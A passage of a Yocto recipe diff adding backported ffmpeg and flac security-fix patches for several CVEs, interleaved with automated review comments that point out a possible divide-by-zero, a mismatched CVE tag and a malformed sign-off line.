diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch
new file mode 100644
index 0000000000..3b503c49c9
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch
@@ -0,0 +1,97 @@
+From 24a58d70cbb3997e471366bd5afe54be9007bfb1 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 15:32:14 +0000
+Subject: [PATCH] libavutil: include assembly with full path from source root
+
+Otherwise nasm writes the full host-specific paths into .o
+output, which breaks binary reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ libavutil/x86/cpuid.asm | 2 +-
+ libavutil/x86/emms.asm | 2 +-
+ libavutil/x86/fixed_dsp.asm | 2 +-
+ libavutil/x86/float_dsp.asm | 2 +-
+ libavutil/x86/lls.asm | 2 +-
+ libavutil/x86/pixelutils.asm | 2 +-
+ 6 files changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/libavutil/x86/cpuid.asm b/libavutil/x86/cpuid.asm
+index c3f7866..766f77f 100644
+--- a/libavutil/x86/cpuid.asm
++++ b/libavutil/x86/cpuid.asm
+@@ -21,7 +21,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/emms.asm b/libavutil/x86/emms.asm
+index 8611762..df84f22 100644
+--- a/libavutil/x86/emms.asm
++++ b/libavutil/x86/emms.asm
+@@ -18,7 +18,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/fixed_dsp.asm b/libavutil/x86/fixed_dsp.asm
+index 979dd5c..2f41185 100644
+--- a/libavutil/x86/fixed_dsp.asm
++++ b/libavutil/x86/fixed_dsp.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/float_dsp.asm b/libavutil/x86/float_dsp.asm
+index 517fd63..b773e61 100644
+--- a/libavutil/x86/float_dsp.asm
++++ b/libavutil/x86/float_dsp.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION_RODATA 32
+ pd_reverse: dd 7, 6, 5, 4, 3, 2, 1, 0
+diff --git a/libavutil/x86/lls.asm b/libavutil/x86/lls.asm
+index 317fba6..d2526d1 100644
+--- a/libavutil/x86/lls.asm
++++ b/libavutil/x86/lls.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/pixelutils.asm b/libavutil/x86/pixelutils.asm
+index 36c57c5..8b45ead 100644
+--- a/libavutil/x86/pixelutils.asm
++++ b/libavutil/x86/pixelutils.asm
+@@ -21,7 +21,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
new file mode 100644
index 0000000000..abfc024820
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
@@ -0,0 +1,61 @@
+From 3bce9e9b3ea35c54bacccc793d7da99ea5157532 Mon Sep 17 00:00:00 2001
+From: Paul B Mahol <onemda@gmail.com>
+Date: Mon, 27 Jan 2020 21:53:08 +0100
+Subject: [PATCH] avformat/tty: add probe function
+
+CVE: CVE-2021-3566
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=3bce9e9b3ea35c54bacccc793d7da99ea5157532]
+Comment: No changes/refreshing done.
+---
+ libavformat/tty.c | 21 ++++++++++++++++++++-
+ 1 file changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/libavformat/tty.c b/libavformat/tty.c
+index 8d48f2c45c12..60f7e9f87ee7 100644
+--- a/libavformat/tty.c
++++ b/libavformat/tty.c
+@@ -34,6 +34,13 @@
+ #include "internal.h"
+ #include "sauce.h"
+
++static int isansicode(int x)
++{
++ return x == 0x1B || x == 0x0A || x == 0x0D || (x >= 0x20 && x < 0x7f);
++}
++
++static const char tty_extensions[31] = "ans,art,asc,diz,ice,nfo,txt,vt";
++
+ typedef struct TtyDemuxContext {
+ AVClass *class;
+ int chars_per_frame;
+@@ -42,6 +49,17 @@ typedef struct TtyDemuxContext {
+ AVRational framerate; /**< Set by a private option. */
+ } TtyDemuxContext;
+
++static int read_probe(const AVProbeData *p)
++{
++ int cnt = 0;
++
++ for (int i = 0; i < p->buf_size; i++)
++ cnt += !!isansicode(p->buf[i]);
++
++ return (cnt * 100LL / p->buf_size) * (cnt > 400) *
++ !!av_match_ext(p->filename, tty_extensions);
++}
++
+ /**
+ * Parse EFI header
+ */
+@@ -153,8 +171,9 @@ AVInputFormat ff_tty_demuxer = {
+ .name = "tty",
+ .long_name = NULL_IF_CONFIG_SMALL("Tele-typewriter"),
+ .priv_data_size = sizeof(TtyDemuxContext),
++ .read_probe = read_probe,
+ .read_header = read_header,
+ .read_packet = read_packet,
+- .extensions = "ans,art,asc,diz,ice,nfo,txt,vt",
++ .extensions = tty_extensions,
+ .priv_class = &tty_demuxer_class,
+ };
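Review bot: In the added `read_probe()`, `cnt * 100LL / p->buf_size` divides by `p->buf_size` unconditionally, so a probe call with an empty buffer is a division by zero; the `(cnt > 400)` factor does not protect it because the division is evaluated first. Whether the probing code in this ffmpeg version can reach the demuxer with `buf_size == 0` is not visible here, but the guard is cheap: `if (!p->buf_size) return 0;` before the loop. A smaller point is `tty_extensions[31]`, which is sized exactly for the current string; `tty_extensions[]` would keep the terminating NUL if the list is ever edited. Either change makes the file differ from the upstream commit, so the header line "No changes/refreshing done" would need updating.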
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
new file mode 100644
index 0000000000..e5be985fc3
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
@@ -0,0 +1,53 @@
+From e01d306c647b5827102260b885faa223b646d2d1 Mon Sep 17 00:00:00 2001
+From: James Almer <jamrial@gmail.com>
+Date: Wed, 21 Jul 2021 01:02:44 -0300
+Subject: [PATCH] avcodec/utils: don't return negative values in
+ av_get_audio_frame_duration()
+
+In some extrme cases, like with adpcm_ms samples with an extremely high channel
+count, get_audio_frame_duration() may return a negative frame duration value.
+Don't propagate it, and instead return 0, signaling that a duration could not
+be determined.
+
+CVE: CVE-2021-3566
+Fixes ticket #9312
+Signed-off-by: James Almer <jamrial@gmail.com>
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=e01d306c647b5827102260b885faa223b646d2d1]
+Comment: No changes/refreshing done.
+---
+ libavcodec/utils.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/libavcodec/utils.c b/libavcodec/utils.c
+index 5fad782f5a..cfc07cbcb8 100644
+--- a/libavcodec/utils.c
++++ b/libavcodec/utils.c
+@@ -810,20 +810,22 @@ static int get_audio_frame_duration(enum AVCodecID id, int sr, int ch, int ba,
+
+ int av_get_audio_frame_duration(AVCodecContext *avctx, int frame_bytes)
+ {
+- return get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
++ int duration = get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
+ avctx->channels, avctx->block_align,
+ avctx->codec_tag, avctx->bits_per_coded_sample,
+ avctx->bit_rate, avctx->extradata, avctx->frame_size,
+ frame_bytes);
++ return FFMAX(0, duration);
+ }
+
+ int av_get_audio_frame_duration2(AVCodecParameters *par, int frame_bytes)
+ {
+- return get_audio_frame_duration(par->codec_id, par->sample_rate,
++ int duration = get_audio_frame_duration(par->codec_id, par->sample_rate,
+ par->channels, par->block_align,
+ par->codec_tag, par->bits_per_coded_sample,
+ par->bit_rate, par->extradata, par->frame_size,
+ frame_bytes);
++ return FFMAX(0, duration);
+ }
+
+ #if !HAVE_THREADS
+--
+2.20.1
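Review bot: The patch header carries `CVE: CVE-2021-3566`, but the file is named CVE-2021-38291.patch, and its change (clamping the result of `av_get_audio_frame_duration()` to non-negative values) is unrelated to the tty probe patch that uses the same tag. Tooling that reads the `CVE:` tag to decide which CVEs a recipe has patched would credit the wrong identifier. Assuming the file name is the correct one, the tag should read `CVE: CVE-2021-38291`.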
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
new file mode 100644
index 0000000000..bd8a08a216
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
@@ -0,0 +1,36 @@
+From: Michael Niedermayer <michael@niedermayer.cc>
+Date: Sun, 27 Feb 2022 14:43:04 +0100
+Subject: [PATCH] avcodec/g729_parser: Check channels
+
+Fixes: signed integer overflow: 10 * 808464428 cannot be represented in type 'int'
+Fixes: assertion failure
+Fixes: ticket9651
+
+Reviewed-by: Paul B Mahol <onemda@gmail.com>
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+(cherry picked from commit 757da974b21833529cc41bdcc9684c29660cdfa8)
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-1475
+Upstream-Status: Backport [https://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=e9e2ddbc6c78cc18b76093617f82c920e58a8d1f]
+Comment: Patch is refreshed as per ffmpeg codebase
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ libavcodec/g729_parser.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+Index: ffmpeg-4.2.2/libavcodec/g729_parser.c
+===================================================================
+--- a/libavcodec/g729_parser.c
++++ b/libavcodec/g729_parser.c
+@@ -48,6 +48,9 @@ static int g729_parse(AVCodecParserConte
+ av_assert1(avctx->codec_id == AV_CODEC_ID_G729);
+ /* FIXME: replace this heuristic block_size with more precise estimate */
+ s->block_size = (avctx->bit_rate < 8000) ? G729D_6K4_BLOCK_SIZE : G729_8K_BLOCK_SIZE;
++ // channels > 2 is invalid, we pass the packet on unchanged
++ if (avctx->channels > 2)
++ s->block_size = 0;
+ s->block_size *= avctx->channels;
+ s->duration = avctx->frame_size;
+ }
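Review bot: Setting `s->block_size = 0` for `avctx->channels > 2` only has the effect the new comment describes if the code after this block treats a zero block size as pass-through, and that code is outside the hunk. The header says the patch was refreshed for the 4.2.2 tree, so confirm that this version of `g729_parse()` has that zero check before relying on the fix. The comment could name the dependency, e.g. `// channels > 2 is invalid; block_size 0 makes the check below pass the packet on unchanged`. `g729_parse()` starts before and ends after the hunk.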
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
new file mode 100644
index 0000000000..febf49cff2
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
@@ -0,0 +1,41 @@
+From 656cb0450aeb73b25d7d26980af342b37ac4c568 Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Tue, 15 Feb 2022 17:58:08 +0800
+Subject: [PATCH] avcodec/vp3: Add missing check for av_malloc
+
+Since the av_malloc() may fail and return NULL pointer,
+it is needed that the 's->edge_emu_buffer' should be checked
+whether the new allocation is success.
+
+Fixes: d14723861b ("VP3: fix decoding of videos with stride > 2048")
+
+CVE: CVE-2022-3109
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/656cb0450aeb73b25d7d26980af342b37ac4c568]
+Comments: Refreshed hunk
+
+Reviewed-by: Peter Ross <pross@xvid.org>
+Signed-off-by: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavcodec/vp3.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/libavcodec/vp3.c b/libavcodec/vp3.c
+index e9ab54d73677..e2418eb6fa04 100644
+--- a/libavcodec/vp3.c
++++ b/libavcodec/vp3.c
+@@ -2740,8 +2740,13 @@
+ if (ff_thread_get_buffer(avctx, &s->current_frame, AV_GET_BUFFER_FLAG_REF) < 0)
+ goto error;
+
+- if (!s->edge_emu_buffer)
++ if (!s->edge_emu_buffer) {
+ s->edge_emu_buffer = av_malloc(9 * FFABS(s->current_frame.f->linesize[0]));
++ if (!s->edge_emu_buffer) {
++ ret = AVERROR(ENOMEM);
++ goto error;
++ }
++ }
+
+ if (s->keyframe) {
+ if (!s->theora) {
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
new file mode 100644
index 0000000000..fcbd9b3e1b
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
@@ -0,0 +1,67 @@
+From 9cf652cef49d74afe3d454f27d49eb1a1394951e Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Wed, 23 Feb 2022 10:31:59 +0800
+Subject: [PATCH] avformat/nutdec: Add check for avformat_new_stream
+
+Check for failure of avformat_new_stream() and propagate
+the error code.
+
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-3341
+
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/9cf652cef49d74afe3d454f27d49eb1a1394951e]
+
+Comments: Refreshed Hunk
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavformat/nutdec.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/libavformat/nutdec.c b/libavformat/nutdec.c
+index 0a8a700acf..f9ad2c0af1 100644
+--- a/libavformat/nutdec.c
++++ b/libavformat/nutdec.c
+@@ -351,8 +351,12 @@ static int decode_main_header(NUTContext *nut)
+ ret = AVERROR(ENOMEM);
+ goto fail;
+ }
+- for (i = 0; i < stream_count; i++)
+- avformat_new_stream(s, NULL);
++ for (i = 0; i < stream_count; i++) {
++ if (!avformat_new_stream(s, NULL)) {
++ ret = AVERROR(ENOMEM);
++ goto fail;
++ }
++ }
+
+ return 0;
+ fail:
+@@ -793,19 +793,23 @@
+ NUTContext *nut = s->priv_data;
+ AVIOContext *bc = s->pb;
+ int64_t pos;
+- int initialized_stream_count;
++ int initialized_stream_count, ret;
+
+ nut->avf = s;
+
+ /* main header */
+ pos = 0;
++ ret = 0;
+ do {
++ if (ret == AVERROR(ENOMEM))
++ return ret;
++
+ pos = find_startcode(bc, MAIN_STARTCODE, pos) + 1;
+ if (pos < 0 + 1) {
+ av_log(s, AV_LOG_ERROR, "No main startcode found.\n");
+ goto fail;
+ }
+- } while (decode_main_header(nut) < 0);
++ } while ((ret = decode_main_header(nut)) < 0);
+
+ /* stream headers */
+ pos = 0;
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
new file mode 100644
index 0000000000..707073709a
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
@@ -0,0 +1,136 @@
+From d4b7b3c03ee2baf0166ce49dff17ec9beff684db Mon Sep 17 00:00:00 2001
+From: Anton Khirnov <anton@khirnov.net>
+Date: Fri, 2 Sep 2022 22:21:27 +0200
+Subject: [PATCH] lavc/pthread_frame: avoid leaving stale hwaccel state in
+ worker threads
+
+This state is not refcounted, so make sure it always has a well-defined
+owner.
+
+Remove the block added in 091341f2ab5bd35ca1a2aae90503adc74f8d3523, as
+this commit also solves that issue in a more general way.
+
+(cherry picked from commit cc867f2c09d2b69cee8a0eccd62aff002cbbfe11)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 35aa7e70e7ec350319e7634a30d8d8aa1e6ecdda)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 3bc28e9d1ab33627cea3c632dd6b0c33e22e93ba)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+
+CVE: CVE-2022-48434
+Upstream-Status: Backport [https://git.ffmpeg.org/gitweb/ffmpeg.git/commit/d4b7b3c03ee2baf0166ce49dff17ec9beff684db]
+Signed-off-by: Ranjitsinh Rathod ranjitsinh.rathod@kpit.com
+Comment: Hunk#6 refreshed to backport changes and other to remove patch-fuzz warnings
+---
+ libavcodec/pthread_frame.c | 46 +++++++++++++++++++++++++++++---------
+ 1 file changed, 35 insertions(+), 11 deletions(-)
+
+diff --git a/libavcodec/pthread_frame.c b/libavcodec/pthread_frame.c
+index 36ac0ac..bbc5ba6 100644
+--- a/libavcodec/pthread_frame.c
++++ b/libavcodec/pthread_frame.c
+@@ -135,6 +135,12 @@ typedef struct FrameThreadContext {
+ * Set for the first N packets, where N is the number of threads.
+ * While it is set, ff_thread_en/decode_frame won't return any results.
+ */
++
++ /* hwaccel state is temporarily stored here in order to transfer its ownership
++ * to the next decoding thread without the need for extra synchronization */
++ const AVHWAccel *stash_hwaccel;
++ void *stash_hwaccel_context;
++ void *stash_hwaccel_priv;
+ } FrameThreadContext;
+
+ #define THREAD_SAFE_CALLBACKS(avctx) \
+@@ -211,9 +217,17 @@ static attribute_align_arg void *frame_worker_thread(void *arg)
+ ff_thread_finish_setup(avctx);
+
+ if (p->hwaccel_serializing) {
++ /* wipe hwaccel state to avoid stale pointers lying around;
++ * the state was transferred to FrameThreadContext in
++ * ff_thread_finish_setup(), so nothing is leaked */
++ avctx->hwaccel = NULL;
++ avctx->hwaccel_context = NULL;
++ avctx->internal->hwaccel_priv_data = NULL;
++
+ p->hwaccel_serializing = 0;
+ pthread_mutex_unlock(&p->parent->hwaccel_mutex);
+ }
++ av_assert0(!avctx->hwaccel);
+
+ if (p->async_serializing) {
+ p->async_serializing = 0;
+@@ -275,14 +289,10 @@ static int update_context_from_thread(AVCodecContext *dst, AVCodecContext *src,
+ dst->color_range = src->color_range;
+ dst->chroma_sample_location = src->chroma_sample_location;
+
+- dst->hwaccel = src->hwaccel;
+- dst->hwaccel_context = src->hwaccel_context;
+-
+ dst->channels = src->channels;
+ dst->sample_rate = src->sample_rate;
+ dst->sample_fmt = src->sample_fmt;
+ dst->channel_layout = src->channel_layout;
+- dst->internal->hwaccel_priv_data = src->internal->hwaccel_priv_data;
+
+ if (!!dst->hw_frames_ctx != !!src->hw_frames_ctx ||
+ (dst->hw_frames_ctx && dst->hw_frames_ctx->data != src->hw_frames_ctx->data)) {
+@@ -415,6 +425,12 @@ static int submit_packet(PerThreadContext *p, AVCodecContext *user_avctx,
+ pthread_mutex_unlock(&p->mutex);
+ return err;
+ }
++
++ /* transfer hwaccel state stashed from previous thread, if any */
++ av_assert0(!p->avctx->hwaccel);
++ FFSWAP(const AVHWAccel*, p->avctx->hwaccel, fctx->stash_hwaccel);
++ FFSWAP(void*, p->avctx->hwaccel_context, fctx->stash_hwaccel_context);
++ FFSWAP(void*, p->avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
+ }
+
+ av_packet_unref(&p->avpkt);
+@@ -616,6 +632,14 @@ void ff_thread_finish_setup(AVCodecContext *avctx) {
+ async_lock(p->parent);
+ }
+
++ /* save hwaccel state for passing to the next thread;
++ * this is done here so that this worker thread can wipe its own hwaccel
++ * state after decoding, without requiring synchronization */
++ av_assert0(!p->parent->stash_hwaccel);
++ p->parent->stash_hwaccel = avctx->hwaccel;
++ p->parent->stash_hwaccel_context = avctx->hwaccel_context;
++ p->parent->stash_hwaccel_priv = avctx->internal->hwaccel_priv_data;
++
+ pthread_mutex_lock(&p->progress_mutex);
+ if(atomic_load(&p->state) == STATE_SETUP_FINISHED){
+ av_log(avctx, AV_LOG_WARNING, "Multiple ff_thread_finish_setup() calls\n");
+@@ -657,13 +681,6 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+
+ park_frame_worker_threads(fctx, thread_count);
+
+- if (fctx->prev_thread && fctx->prev_thread != fctx->threads)
+- if (update_context_from_thread(fctx->threads->avctx, fctx->prev_thread->avctx, 0) < 0) {
+- av_log(avctx, AV_LOG_ERROR, "Final thread update failed\n");
+- fctx->prev_thread->avctx->internal->is_copy = fctx->threads->avctx->internal->is_copy;
+- fctx->threads->avctx->internal->is_copy = 1;
+- }
+-
+ for (i = 0; i < thread_count; i++) {
+ PerThreadContext *p = &fctx->threads[i];
+
+@@ -713,6 +730,13 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+ pthread_mutex_destroy(&fctx->async_mutex);
+ pthread_cond_destroy(&fctx->async_cond);
+
++ /* if we have stashed hwaccel state, move it to the user-facing context,
++ * so it will be freed in avcodec_close() */
++ av_assert0(!avctx->hwaccel);
++ FFSWAP(const AVHWAccel*, avctx->hwaccel, fctx->stash_hwaccel);
++ FFSWAP(void*, avctx->hwaccel_context, fctx->stash_hwaccel_context);
++ FFSWAP(void*, avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
++
+ av_freep(&avctx->internal->thread_ctx);
+
+ if (avctx->priv_data && avctx->codec && avctx->codec->priv_class)
+--
+2.25.1
+
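Review bot: The trailer `Signed-off-by: Ranjitsinh Rathod ranjitsinh.rathod@kpit.com` has no angle brackets around the address, unlike the other Signed-off-by lines visible in this commit, so tools that parse trailers may not pick up the address. It should read `Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>`. The `Comment:` line says hunk 6 was refreshed; counting in order, that is the removal of the "Final thread update" block in `ff_frame_thread_free`, which is the part to compare against the upstream commit.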
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
index fddfef9e27..f12052548f 100644
--- a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
@@ -26,7 +26,14 @@ LIC_FILES_CHKSUM = "file://COPYING.GPLv2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
SRC_URI = "https://www.ffmpeg.org/releases/${BP}.tar.xz \
file://mips64_cpu_detection.patch \
file://CVE-2020-12284.patch \
- "
+ file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \
+ file://CVE-2021-3566.patch \
+ file://CVE-2021-38291.patch \
+ file://CVE-2022-1475.patch \
+ file://CVE-2022-3109.patch \
+ file://CVE-2022-3341.patch \
+ file://CVE-2022-48434.patch \
+ "
SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3"
SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c"
@@ -129,6 +136,11 @@ do_configure() {
${S}/configure ${EXTRA_OECONF}
}
+# patch out build host paths for reproducibility
+do_compile_prepend_class-target() {
+ sed -i -e "s,${WORKDIR},,g" ${B}/config.h
+}
+
PACKAGES =+ "libavcodec \
libavdevice \
libavfilter \
diff --git a/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
new file mode 100644
index 0000000000..e042872dc0
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
@@ -0,0 +1,197 @@
+From 579ff6922089cbbbd179619e40e622e279bd719f Mon Sep 17 00:00:00 2001
+From: Martijn van Beurden <mvanb1@gmail.com>
+Date: Wed, 3 Aug 2022 13:52:19 +0200
+Subject: [PATCH] flac: Add and use _nofree variants of safe_realloc functions
+
+Parts of the code use realloc like
+
+x = safe_realloc(x, somesize);
+
+when this is the case, the safe_realloc variant used must free the
+old memory block in case it fails, otherwise it will leak. However,
+there are also instances in the code where handling is different:
+
+if (0 == (x = safe_realloc(y, somesize)))
+ return false
+
+in this case, y should not be freed, as y is not set to NULL we
+could encounter double frees. Here the safe_realloc_nofree
+functions are used.
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/21fe95ee828b0b9b944f6aa0bb02d24fbb981815]
+CVE: CVE-2020-22219
+
+Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com>
+---
+ include/share/alloc.h | 41 +++++++++++++++++++++++++++++++----
+ src/flac/encode.c | 4 ++--
+ src/flac/foreign_metadata.c | 2 +-
+ src/libFLAC/bitwriter.c | 2 +-
+ src/libFLAC/metadata_object.c | 2 +-
+ src/plugin_common/tags.c | 2 +-
+ src/share/utf8/iconvert.c | 2 +-
+ 7 files changed, 44 insertions(+), 11 deletions(-)
+
+diff --git a/include/share/alloc.h b/include/share/alloc.h
+index 914de9b..55bdd1d 100644
+--- a/include/share/alloc.h
++++ b/include/share/alloc.h
+@@ -161,17 +161,30 @@ static inline void *safe_realloc_(void *ptr, size_t size)
+ free(oldptr);
+ return newptr;
+ }
+-static inline void *safe_realloc_add_2op_(void *ptr, size_t size1, size_t size2)
++static inline void *safe_realloc_nofree_add_2op_(void *ptr, size_t size1, size_t size2)
++{
++ size2 += size1;
++ if(size2 < size1)
++ return 0;
++ return realloc(ptr, size2);
++}
++
++static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+ size2 += size1;
+ if(size2 < size1) {
+ free(ptr);
+ return 0;
+ }
+- return realloc(ptr, size2);
++ size3 += size2;
++ if(size3 < size2) {
++ free(ptr);
++ return 0;
++ }
++ return safe_realloc_(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
++static inline void *safe_realloc_nofree_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+ size2 += size1;
+ if(size2 < size1)
+@@ -182,7 +195,7 @@ static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2,
+ return realloc(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
++static inline void *safe_realloc_nofree_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
+ {
+ size2 += size1;
+ if(size2 < size1)
+@@ -205,6 +218,15 @@ static inline void *safe_realloc_mul_2op_(void *ptr, size_t size1, size_t size2)
+ return safe_realloc_(ptr, size1*size2);
+ }
+
++static inline void *safe_realloc_nofree_mul_2op_(void *ptr, size_t size1, size_t size2)
++{
++ if(!size1 || !size2)
++ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++ if(size1 > SIZE_MAX / size2)
++ return 0;
++ return realloc(ptr, size1*size2);
++}
++
+ /* size1 * (size2 + size3) */
+ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+@@ -216,4 +238,15 @@ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2,
+ return safe_realloc_mul_2op_(ptr, size1, size2);
+ }
+
++/* size1 * (size2 + size3) */
++static inline void *safe_realloc_nofree_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
++{
++ if(!size1 || (!size2 && !size3))
++ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++ size2 += size3;
++ if(size2 < size3)
++ return 0;
++ return safe_realloc_nofree_mul_2op_(ptr, size1, size2);
++}
++
+ #endif
+diff --git a/src/flac/encode.c b/src/flac/encode.c
+index a9b907f..f87250c 100644
+--- a/src/flac/encode.c
++++ b/src/flac/encode.c
+@@ -1743,10 +1743,10 @@ static void static_metadata_clear(static_metadata_t *m)
+ static FLAC__bool static_metadata_append(static_metadata_t *m, FLAC__StreamMetadata *d, FLAC__bool needs_delete)
+ {
+ void *x;
+- if(0 == (x = safe_realloc_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++ if(0 == (x = safe_realloc_nofree_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
+ return false;
+ m->metadata = (FLAC__StreamMetadata**)x;
+- if(0 == (x = safe_realloc_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++ if(0 == (x = safe_realloc_nofree_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
